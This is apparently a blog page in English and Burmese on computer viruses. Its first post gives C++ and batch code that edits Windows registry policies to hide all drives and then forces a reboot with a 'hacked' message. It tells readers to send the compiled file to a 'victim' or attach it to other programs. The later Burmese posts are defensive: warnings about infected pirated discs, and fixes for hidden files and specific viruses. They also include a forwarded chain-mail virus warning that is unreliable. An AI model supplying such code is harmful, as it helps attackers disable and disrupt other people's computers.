Batch Virus code to disable All Hard disk



Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.









C++ Virus Code :


#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }



Copy the above code and paste in notepad Save the file with .cpp extension Compile and create .exe file in cpp

Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f


I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

10:35 AM | Posted in | Read More »

Virus ပါ၀င္ေသာ အင္တာနက္ သီခ်င္းမ်ားစုစည္းမႈ DVD/VCD

လမ္းေဘးဆိုင္က ဝယ္လာတဲ့ VCD/DVD ဇာတ္ကားအခ်ိဳ႔အေခြေတြမွာ ကြန္ပ်ဴတာ စက္ထဲ ထည့္လိုက္ၿပီး အသံုးျပဳၾကည့္မိရင္ ေနာက္တစ္ေန႔ Windows မတက္ပဲ ေအာ္တို Restart က်သြားၾကပါတယ္။ 

သူငယ္ခ်င္းမ်ား လမ္းေဘးက အေခြေတြ ကြန္ပ်ဴဳတာထဲ ထည့္မယ္ဆိုရင္ ကြန္ပ်ဴတာမွာ အဲဒီ အေခြကို my computer မွာ double click မႏွိပ္ပဲ XYplorer နဲ႔ hidden file ေတြရွာၾကည့္ေတာ့ ..

AUTORUN.INF
EDC DPROT.ICO
PRO.BAT,
PRO.EXE
VCD_play.exe ဖိုင္ေတြကို ေတြ႔ရပါတယ္။

ကိုယ့္ကြန္ပ်ဴတာထဲကို အဲဒီ အခ်ပ္ ထည့္လိုက္တာနဲ႔ autorun ၿပီးေတာ့ ကိုယ့္ကြန္ပ်ဴတာ Drive C: ထဲက
boot.ini
IO.SYS
MSDOS.SYS
NTDETECT.COM ဖိုင္ေတြရယ္ C:\windows ထဲက
system.ini
win.ini
အစရွိတဲ့ ဖုိုင္ေတြကို ..လံုး၀ DELETE လုပ္ပစ္လိုက္ပါတယ္..။

အဲဒီေတာ့ windows ကို ျပန္တင္ရင္တင္၊ မတင္ရင္ Repair လုပ္၊ မလုပ္ခ်င္ရင္ ..Virus က ဖ်က္လိုက္တဲ့ ဖုိင္ေတြကို ေကာ္ပီကူးလိုက္...။ အလုပ္ေတာ့ ေတာ္ေတာ္ရႈပ္ပါတယ္..။

ၾကားထဲ့က အခန္႔မသင့္ရင္ Drive ေတြကို Format ခ်မိၿပီး DATA ေတြပါ ပ်က္ဆီးႏိုင္ပါတယ္..။

အဲဒီေတာ့ အဲဒီ သီခ်င္းေခြကို လံုး၀ ကြန္ပ်ဴတာနဲ႔ ဖြင့္မၾကည့္ၾကပါနဲ႔..။ AUTORUN ကို ပိတ္ထားတဲ့ ကြန္ပ်ဴတာေတြမွာလည္း My Computer ထဲကေန အဲဒီ သီခ်င္းေခြထည့္ထားတဲ့ Drive ကို Double Click ႏွိပ္မိရင္ ... ကြန္ပ်ဴတာထဲက system file ေတြ အဖ်က္ခံရႏိုင္ပါတယ္..။

တစ္ခုထူးျခားတာက သူ႔ကို AntiVirus Software ေတာ္ေတာ္မ်ားမ်ားက သတ္ေပးလို႔မရပါဘူး..။ ဘာျဖစ္လုိ႔ လဲဆိုေတာ့ DVD, CD ထဲက System File ေတြ ျဖစ္ေနလို႔ပါ ..။ အဲဒါက ပိုအႏၱရာယ္ႀကီးပါတယ္..။

အဲဒီေတာ့ အဲဒီလိုမျဖစ္ေအာင္ CD/DVD ထဲက System File, Hidden File ေတြကိုျမင္ရေအာင္ အလြယ္ တကူ install လုပ္လို႔ရတဲ့ XYPLORER ကို ထည့္ထားၾကပါ..။ အဲဒီ FILE MANAGER SOFTWARE ေလးက windows explorer နဲ႕ ပံုစံအတူတူပါပဲ ..။ ဒါေပမယ့္ သူက windows explorer မွာ မျမင္ရတဲ့ hidden/ Super Hidden လုပ္ထားတဲ့ဖိုင္ေတြအားလံုးနီးပါးကို ျမင္ရၿပီး hidden ကိုလည္း ျဖဳတ္လို႔ ရပါတယ္..။

သူ႔ရဲ႕အသံုး၀င္ပံုက ကြန္ပ်ဴတာနဲ႔ ခ်ိတ္ဆက္သမွ် Drive ေတြအကုန္လံုးရဲ႕ Hidden File ေတြကို ျမင္ရ ပါတယ္..။ ၿပီးေတာ့ USB Stick, Memory Card, Hard Disk ေတြထဲက ဖိုင္ေတြကို ဖ်က္လို႔ ကူးလို႔ ရပါတယ္.။

အင္တာနက္မွာ download လုပ္လို႔ရတဲ့ ဒီ software ေလးက ရက္သံုးဆယ္ပဲသံုးလို႔ရပါတယ္..။ ရက္သံုး ဆယ္ျပည့္ရင္ Uninstall ျပန္လုပ္ၿပီး Install ျပန္လုပ္ရင္ ရက္သံုးဆယ္ ျပန္ရပါတယ္..။ ေအာက္မွာမူရင္းဆိုဒ္သို႔သြားၿပီး  ေဒါင္းလုပ္ လုပ္ၿပီးသံုးၾကည့္ၾကပါ..။


http://www.xyplorer.com/download.php

အခု ေနာက္ဆံုးအင္တာနက္ဂ်ာနယ္မွာပါလာတဲ့သတင္းအရ အင္တာနက္သီခ်င္းမ်ားစုစည္းမႈ (၄) အေခြမွာ ပါ အဲဒီလို Virus ပါ၀င္ေၾကာင္း သိရပါတယ္..။

DVD, CD ခိုးကူးတဲ့လူေတြက .. သူတုိ႔က်ေတာ့ သီခ်င္းေတြကို လက္ေရြးစင္ထုတ္ ခိုးကူးၿပီး ...တျခား သူ ေတြ၊ ကြန္ပ်ဴတာအသံုးျပဳတဲ့သူေတြက သူတို႔ခိုးကူးထားတဲ့သီခ်င္းေတြကို .. စိတ္ႀကိဳက္ မေရြးခ်ယ္ႏိုင္၊ မသိမ္းဆည္းႏိုင္၊ ျပန္မကူးႏိုင္ေအာင္ ေအာက္တန္းက်စြာနဲ႔ ဖန္တီးထားတာပါ..။ သူတုိ႔က Windows System မပါတဲ့ DVD အေခြပြားစက္ Duplicator ေတြနဲ႔သံုးေတာ့ အဲဒီ Virus ထည့္ထားတဲ့ DVD, CD ေတြ ကို ရာေထာင္ခ်ီၿပီးပြားႏိုင္ပါတယ္..။ သူတို႔စက္ေတြ မပ်က္ပါဘူး ..။ သူတို႔ပဲခိုးကူးစားမယ္ ဆိုတဲ့ သေဘာ ပါ..။ 


1:47 PM | Posted in | Read More »

Virus ထိျပီး ေနာက္ပုိင္း Disable ျဖစ္သြားတဲ႔ ေကာင္ကို Enable လုပ္မယ္

Virus ထိျပီဆုိရင္ေတာ႔ မိမိတုိ႔စက္မွာ အားေလ်ာ္စြာ စက္က တစ္ခုခုျဖစ္သြားျပီ ။ မ်ားေသာ အားျဖင္႔ေတာ႔ ထိျပီဆုိရင္ Taskmanager ကို Disable လုပ္မယ္ ။ Run box , Regedit, Control pen , စသည္ျဖင္႔ Disable လုပ္ထားမည္ကို ေတြ႔ရမွာပါ ။ ဒါေတြကို Enable လုပ္ဖုိ႔ ကြ်မ္းကြ်င္တဲ႔ သူေတြက လြယ္ကူေပမယ္႔ မတတ္တဲ႔ သူေတြေတာ႔ တုိင္ပတ္မွာတာ႔ ေသခ်ာပါတယ္ ။ မေတာ္လုိ႔ ဆုိင္ပုိ႔ရင္လည္း ဆုိင္က ေဘာ္ေဘာ္ တုိ႔က အားနာတတ္မွာ မဟုတ္ပါဘူး ။ ဒါေၾကာင္႔ တတ္သည္ျဖစ္ေစ မတတ္သည္ျဖစ္ေစ လုိလုိမယ္မယ္ဆုိ သည္႔ ကိုယ္ဖာသာကိုယ္ ေျဖရွင္းလိုရေအာင္ ေအာက္က Software ကို ေဒါင္းၿပီး လုပ္ၾကည့္လိုက္ပါ။



4:27 PM | Posted in , | Read More »

noenoe.jetma.vbs virus ကိုေျဖရွင္းနည္း

ကၽြန္ေတာ္တို႔ စက္ကိုဖြင့္လိုက္တဲ့အခါတိုင္း “Can not find script file c:\windows\system32\ NoeNoeJetma.vbs” ဆို တဲ့ ေအာက္ကျပထားတဲ့ ပံုထဲကအတိုင္း dialog box ေလးေပၚေနလွ်င္ေျဖရွင္း တဲ့နည္းျဖစ္ပါတယ္၊


Start > Run > msconfig > StartUp >သို႔သြားၿပီး NoeNoeJetma.vbs တြင္အမွတ္ျခစ္ကိုျဖဳတ္ေပးၿပီး စက္ကို Restart အရင္လုပ္လိုက္ပါ။

  1. HIJInstall.exe ကို ဒီမွာ ေဒါင္းလုပ္ယူၿပီး Install လုပ္ပါ၊
  2. ပရိုဂရမ္ကို run ၿပီး Do a system scan only ကိုႏွိပ္ပါ၊
  3. ၿပီးရင္ c:windows system32NoeNoeJetma.vbs ကိုအမွတ္ျခစ္ေပးၿပီး Fix checked ကိုႏွိပ္ပါ၊
စက္ကိုေနာက္တစ္ၾကိမ္ Restart လုပ္ေပးပါ။ အိုေကပါေစ....

2:29 PM | Posted in | Read More »

virus ေၾကာင့္ "Hidden" ျပန္ေဖာ္မရခဲ့ရင္

virus ေၾကာင့္ "Hidden" ျပန္ေဖာ္မရခဲ့ရင္
file ေတြကုိ သူမ်ားေတြ႔မွာစုိးလုိ႔ Hidden လုပ္ျပီးထားမယ္ အဲ့ဒီအခါစက္ထဲကုိ virus ၀င္လုိ႔ hidden file ေတြျပန္ေဖာ္မရခဲ့ရင္ လုပ္လုိ႔ရတဲ့ နည္းေလးကေတာ့ Registry တြင္ျပန္လည္ ျပဳျပင္ေပးရပါတယ္ လုပ္နည္းကေတာ့....

ပထမဦးဆုံး Run box ကုိေခၚ Run box ေခၚနည္းကေတာ့သိမယ္ထင္တယ္ (window key+R) ႏွိပ္ လုိက္ပါ....

အဲ့ေဘာက္ထဲမွာ ဒီလုိရုိက္လုိက္...regedit...လုိ႔ရုိက္...ေပၚလာတဲ့ေဘာက္ထဲမွာ ဘယ္ဘက္အျခမ္းမွာ Hkey Local Machine ဆုိတဲ့ ေခၚစဥ္ကုိ ျဖည္လုိက္ပါ +ေလးကုိႏုိပ္ျပိးေတာ့ေပါ့ေနာ္...

အဲ့ေအာက္ကေနမွ Software ျပီးရင္ Microsoft ျပီးရင္ Windows ျပိးရင္ Current Version ျပီးရင္ Explorer ျပီးရင္ Advanced ျပီးရင္ Folder ျပီးရင္ Hidden ျပိးရင္ SHOWALL ကုိနုိပ္လုိက္ ညာဘက္ အျခမ္း က CheckedValue  ကုိလစ္ႏွစ္ခ်က္ေခါက္...Value data ကုိ (1)ထားေပးပါ....စက္ကုိ Restart ခ်ေပးလုိက္ပါ....

HKLM\Software\Microsoft\Windows\Current Version\Explorer\Advanced\Folder\Hidden\SHOWALL-------CheckedValue မွာ Value data ကုိ 1 ထားပါ...။

10:56 PM | Posted in | Read More »

လက္ဆင့္ကမ္း Virus

လက္ဆင့္ကမ္း Virus
Microsoft ႏွင့္ Norton တုိ႔မွေပးပို႔လုိက္ေသာသတင္းျဖစ္ပါသည္။ေက်းဇူးျပဳျပီး ဒီသတင္းကို လက္ဆင့္ကမ္း ေပးၾကပါ သင္တုိ႔ဆီသို႔ Power Point Presentation, Life is beautiful ဆုိျပီးေမးလ္တစ္ခု၀င္လာပါခဲ့လွ်င္ မဖြင့္ပါႏွင့္ခ်က္ခ်င္း delete လုပ္ပစ္ပါ။ ထုိေမးကိုဖြင့္ခဲ့မိလွ်င္ သင္၏ computer secreen တြင္ It is too late now, your life is no longer beautiful ဆုိသည့္စာေပၚလာပါလိမ့္မယ္။ ထုိအခါသင္၏ PC မွအရာ အားလံုးေပ်ာက္ဆံုးသြားျပီး၊ ဒီေမးလ္ကိုပို႔သူထံ သင္၏ အမည္၊ e-mail ႏွင့္ password အားလံုး ေရာက္ရွိ သြားပါလိမ့္မယ္။ ဤအရာသည္ အဂၤါေန႔ ေန႔လည္က စတင္ခဲ့ေသာ virus အသစ္ျဖစ္ပါသည္။ Virus ဖန္တီး သူကေတာ့ life owner ဟု မိမိကုိယ္ကုိ အမည္ေပးထားသူတစ္ဦးျဖစ္ပါသည္။ သည္ေမးလ္ကို ခ်က္ခ်င္း လက္ဆင့္ကမ္းေပးၾကပါ။
source:forwardmail

2:46 PM | Posted in | Read More »

RECYCLER virus ကုိ ဘယ္လုိသတ္မလဲ

RECYCLER virus ကုိ ဘယ္လုိသတ္မလဲ

RECYCLER ဆိုၿပီး hidden folder တစ္ခု ေရာက္ေနတယ္သူငယ္ခ်င္းက virus ဆိုလို႔ shift+del လုပ္တာ ခဏပဲပ်က္တယ္။ ေနာက္ေန႔ျပန္ေရာက္ေနျပန္ေရာ အဲဒါအႏၱရာယ္ ႐ွိပါသလား။

၁။ Tools >>Folder Options >> View ကုိသြားၿပီး ေအာက္မွာျပထားတဲ့နံပါတ္ေတြကုိ အမွန္ျခစ္ေလး ျပန္ျဖဳတ္ေပးလုိက္ပါ။
   (I) display the contets of system folders
   (II) hide extensions for known file types
   (III) hide protected operating system files(Recomended)

၂။ Download unlocker ကုိ Download လုပ္လုိက္ပါ။ ၿပီးတာနဲ႔ recycler ဆုိတဲ့ဖုိင္ကုိ unlock လုပ္ၿပီး ဖ်က္ပစ္လုိက္ပါ။ Unlocker ကုိ ေအာက္မွာ တစ္ခါတည္း တင္ထားေပးပါတယ္ ..

၃။ သတ္တဲ့အခ်ိန္မွာ " can not delete RECYCLER:access is denied." ဆုိၿပီး error message ေပၚလာတဲ့အခါမွာ OK ေပးလုိက္ၿပီး unlocker ေပၚလာတတ္ပါတယ္။ အဲ့လုိေပၚလာတဲ့အခါ "noaction","delete","rename","move" ထဲက Delete ကုိေပးလုိက္ၿပီး ဖ်က္ပစ္ပါ .. RECYCLER virus ပ်က္သြားပါလိမ့္မယ္ ..

10:39 AM | Posted in | Read More »